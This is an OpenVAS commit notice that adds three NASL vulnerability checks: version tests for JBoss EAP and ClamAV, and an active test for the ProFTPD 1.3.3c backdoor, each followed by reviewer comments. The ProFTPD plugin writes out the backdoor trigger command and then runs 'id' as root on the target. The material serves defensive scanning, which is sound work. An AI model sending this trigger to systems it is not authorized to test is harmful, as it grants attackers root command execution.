[Openvas-commits] r9607 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Thu Dec 2 19:42:27 CET 2010
Author: mime
Date: 2010-12-02 19:42:22 +0100 (Thu, 02 Dec 2010)
New Revision: 9607
Added:
trunk/openvas-plugins/scripts/gb_JBoss_enterprise_aplication_server_45148.nasl
trunk/openvas-plugins/scripts/gb_clamav_45152.nasl
trunk/openvas-plugins/scripts/gb_proftpd_backdoor_45150.nasl
Modified:
trunk/openvas-plugins/ChangeLog
Log:
Added new plugins
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2010-12-02 13:19:27 UTC (rev 9606)
+++ trunk/openvas-plugins/ChangeLog 2010-12-02 18:42:22 UTC (rev 9607)
@@ -1,5 +1,12 @@
2010-12-02 Michael Meyer <michael.meyer at greenbone.net>
+ * scripts/gb_JBoss_enterprise_aplication_server_45148.nasl,
+ scripts/gb_proftpd_backdoor_45150.nasl,
+ scripts/gb_clamav_45152.nasl:
+ Added new plugins.
+
+2010-12-02 Michael Meyer <michael.meyer at greenbone.net>
+
* scripts/gb_perl_CGI_45145.nasl,
scripts/gb_LittlePhpGallery_45143.nasl,
scripts/gb_bind_45134.nasl:
Added: trunk/openvas-plugins/scripts/gb_JBoss_enterprise_aplication_server_45148.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_JBoss_enterprise_aplication_server_45148.nasl 2010-12-02 13:19:27 UTC (rev 9606)
+++ trunk/openvas-plugins/scripts/gb_JBoss_enterprise_aplication_server_45148.nasl 2010-12-02 18:42:22 UTC (rev 9607)
@@ -0,0 +1,97 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# JBoss Enterprise Application Platform Multiple Remote Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100931);
+ script_bugtraq_id(45148);
+ script_cve_id("CVE-2010-3708","CVE-2010-3862","CVE-2010-3878");
+ script_version ("1.0-$Revision$");
+
+ script_name("JBoss Enterprise Application Platform Multiple Remote Vulnerabilities");
+
+desc = "Overview:
+The JBoss Enterprise Application Platform is prone to multiple
+vulnerabilities, including a remote code-execution issue, a remote denial-of-
+service issue, and a cross-site request-forgery issue.
+
+Successful exploits can allow attackers to execute arbitrary
+code within the context of the affected application, perform
+certain administrative actions, deploy arbitrary WAR files on
+the server, or cause denial-of-service conditions; other attacks
+may also be possible.
+
+These issues affect JBoss Enterprise Application Platform 4.3.0; other
+versions may also be affected.
+
+Solution:
+Updates are available; please see the references for more information.
+
+References:
+https://www.securityfocus.com/bid/45148
+http://www.jboss.com/products/platforms/application/";
+
+ script_tag(name:"risk_factor", value:"Critical");
+ script_description(desc);
+ script_summary("Determine if installed JBoss version is vulnerable");
+ script_category(ACT_GATHER_INFO);
+ script_family("Web Servers");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("JBoss_enterprise_aplication_server_detect.nasl");
+ script_require_ports("Services/www", 8080);
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+
+port = get_http_port(default:8080);
+if(!get_port_state(port))exit(0);
+
+if(!vers = get_kb_item(string("www/", port,"/jboss_enterprise_application_server")))exit(0);
+
+if(!isnull(vers) && vers >!< "unknown") {
+
+ if("GA_CP0" >< vers) {
+ version = eregmatch(pattern:"([0-9.]+)GA_CP0([1-9]+)", string: vers);
+ if(!isnull(version[2])) {
+ vers = version[1] + version[2];
+ }
+ }
+
+ if("GA" >< vers)vers = vers - ".GA";
+
+ if(version_is_less(version: vers, test_version: "4.3.0.9")) {
+ security_hole(port:port);
+ exit(0);
+ }
+
+}
+
+exit(0);
+
+
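Review bot: The cumulative-patch normalisation at `if("GA_CP0" >< vers)` only handles single-digit patch levels, so a KB value carrying `GA_CP10` or higher skips that branch, has only `.GA` stripped by the following line, and reaches `version_is_less()` with `_CP10` still in the string. How that residue compares against `4.3.0.9` is not visible in this hunk, so the verdict for such hosts is unreliable in either direction. Testing for `"GA_CP" >< vers` and using `pattern:"([0-9.]+)GA_CP0*([0-9]+)"` would cover both forms, assuming the detect script stores the version as `<x.y.z>.GA_CP<nn>`. The outer `!isnull(vers)` test is redundant after the `get_kb_item` guard above it. The check also flags every version below 4.3.0.9 although the description names only 4.3.0, so a comment stating that this is intentional would help whoever triages the results.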
Property changes on: trunk/openvas-plugins/scripts/gb_JBoss_enterprise_aplication_server_45148.nasl
___________________________________________________________________
Name: svn:keywords
+ Id Revision
Added: trunk/openvas-plugins/scripts/gb_clamav_45152.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_clamav_45152.nasl 2010-12-02 13:19:27 UTC (rev 9606)
+++ trunk/openvas-plugins/scripts/gb_clamav_45152.nasl 2010-12-02 18:42:22 UTC (rev 9607)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# ClamAV Prior to 0.96.5 Multiple Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100932);
+ script_bugtraq_id(45152);
+ script_version ("1.0-$Revision$");
+
+ script_name("ClamAV Prior to 0.96.5 Multiple Vulnerabilities");
+
+desc = "Overview:
+ClamAV is prone to multiple vulnerabilities.
+
+Attackers may exploit these issues to cause denial-of-service
+conditions or potentially execute arbitrary code in the context of the
+application.
+
+Versions prior to ClamAV 0.96.5 are vulnerable.
+
+Solution:
+Updates are available. Please see the references for more information.
+
+References:
+https://www.securityfocus.com/bid/45152
+http://git.clamav.net/gitweb?p=clamav-devel.git;a=commitdiff;h=1f3db7f074995bd4e1d0183b2db8b1c472d2f41b
+http://www.clamav.net/
+http://git.clamav.net/gitweb?p=clamav-devel.git;a=commitdiff;h=019f1955194360600ecf0644959ceca6734c2d7b
+http://freshmeat.net/projects/clamav/releases/325193";
+
+ script_tag(name:"risk_factor", value:"Critical");
+ script_description(desc);
+ script_summary("Determine if installed ClamAV version is vulnerable");
+ script_category(ACT_GATHER_INFO);
+ script_family("Denial of Service");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("gb_clamav_detect_lin.nasl","gb_clamav_detect_win.nasl","gb_clamav_remote_detect.nasl");
+ exit(0);
+}
+
+include("version_func.inc");
+
+port = get_kb_item("Services/clamd");
+if(!port)port = 0;
+
+ver = get_kb_item("ClamAV/remote/Ver");
+if(!ver) {
+ ver = get_kb_item("ClamAV/Lin/Ver");
+ if(!ver) {
+ ver = get_kb_item("ClamAV/Win/Ver");
+ }
+}
+
+if(!ver)exit(0);
+
+if(version_is_less(version:ver, test_version:"0.96.5")){
+ security_hole(port:port);
+ exit(0);
+}
+
+exit(0);
+
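Review bot: The finding raised by `security_hole(port:port);` does not say which version was detected or which of the three KB entries (`ClamAV/remote/Ver`, `ClamAV/Lin/Ver`, `ClamAV/Win/Ver`) supplied it, which makes the result hard to triage, especially when `port` has fallen back to 0. Passing the version in the report, e.g. `security_hole(port:port, data:string("Detected ClamAV version: ", ver));`, would address that. Because `desc` is assigned inside the `if (description)` block here, it would have to move above that block (as gb_proftpd_backdoor_45150.nasl in this revision does) if the overview text is to stay in the report. The script also has no `script_cve_id()` call, unlike the JBoss plugin added alongside it; if CVE identifiers are assigned for BID 45152 they should be listed.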
Property changes on: trunk/openvas-plugins/scripts/gb_clamav_45152.nasl
___________________________________________________________________
Name: svn:keywords
+ Id Revision
Added: trunk/openvas-plugins/scripts/gb_proftpd_backdoor_45150.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_proftpd_backdoor_45150.nasl 2010-12-02 13:19:27 UTC (rev 9606)
+++ trunk/openvas-plugins/scripts/gb_proftpd_backdoor_45150.nasl 2010-12-02 18:42:22 UTC (rev 9607)
@@ -0,0 +1,120 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# ProFTPD Backdoor Unauthorized Access Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+desc = "Overview:
+ProFTPD is prone to an unauthorized-access vulnerability due to a
+backdoor in certain versions of the application.
+
+Exploiting this issue allows remote attackers to execute arbitrary
+system commands with superuser privileges.
+
+The issue affects the ProFTPD 1.3.3c package downloaded between
+November 28 and December 2, 2010.
+
+The MD5 sums of the unaffected ProFTPD 1.3.3c source packages are
+as follows:
+
+8571bd78874b557e98480ed48e2df1d2 proftpd-1.3.3c.tar.bz2
+4f2c554d6273b8145095837913ba9e5d proftpd-1.3.3c.tar.gz
+
+Files with MD5 sums other than those listed above should be
+considered affected.
+
+Solution:
+The vendor released an advisory to address the issue. Please see the
+references for more information.
+
+References:
+https://www.securityfocus.com/bid/45150
+http://sourceforge.net/mailarchive/message.php?msg_name=alpine.DEB.2.00.1012011542220.12930%40familiar.castaglia.org
+http://www.proftpd.org";
+
+if (description)
+{
+ script_id(100933);
+ script_bugtraq_id(45150);
+ script_version ("1.0-$Revision$");
+
+ script_name("ProFTPD Backdoor Unauthorized Access Vulnerability");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_description(desc);
+ script_summary("Determine if ProFTPD is installed with a backdoor");
+ script_category(ACT_ATTACK);
+ script_family("Gain a shell remotely");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl");
+ script_require_ports("Services/ftp", 21);
+ exit(0);
+}
+
+include("ftp_func.inc");
+
+port = get_kb_item("Services/ftp");
+if(!port){
+ port = 21;
+}
+
+if(get_kb_item('ftp/'+port+'/broken'))exit(0);
+
+if(!get_port_state(port)){
+ exit(0);
+}
+
+banner = get_ftp_banner(port:port);
+if(banner && "ProFTPD" >!< banner)exit(0);
+
+soc = open_sock_tcp(port);
+if(!soc){
+ exit(0);
+}
+
+ftp_recv_line(socket:soc);
+
+ex = string("HELP ACIDBITCHEZ");
+
+r = ftp_send_cmd(socket:soc, cmd:ex);
+r1 = ftp_send_cmd(socket:soc, cmd:string("id;"));
+
+ftp_close(socket:soc);
+
+if(!r1) {
+ exit(0);
+}
+
+if(egrep(pattern:"uid=[0-9]+.*gid=[0-9]+", string:r1)) {
+
+ data = desc + string("\n\n**************************\n");
+ data += string("\nIt was possible to execute the command 'id' on the remote host,\nwhich produces the following output:\n\n");
+ data += r1;
+ data += string("\n**************************\n");
+
+ security_hole(port:port,data:data);
+ exit(0);
+}
+
+exit(0);
+
+
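Review bot: The reply to the first command is stored in `r` but never read, and the return value of `ftp_recv_line(socket:soc)` is discarded, so the code gives no indication whether ignoring both is deliberate. Either drop the `r =` assignment or add a comment such as `# reply to the trigger command is intentionally ignored; only the output of 'id' decides the result`. Since this is an `ACT_ATTACK` test that runs a command on the target when the backdoor is present, a short comment above `ex = ...` stating that only the read-only `id` command is issued would help operators who audit what the scanner sends. The raw server output in `r1` is appended to the report unmodified; restricting it to the part matched by `uid=[0-9]+.*gid=[0-9]+` would avoid copying arbitrary remote data into scan results.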
Property changes on: trunk/openvas-plugins/scripts/gb_proftpd_backdoor_45150.nasl
___________________________________________________________________
Name: svn:keywords
+ Id Revision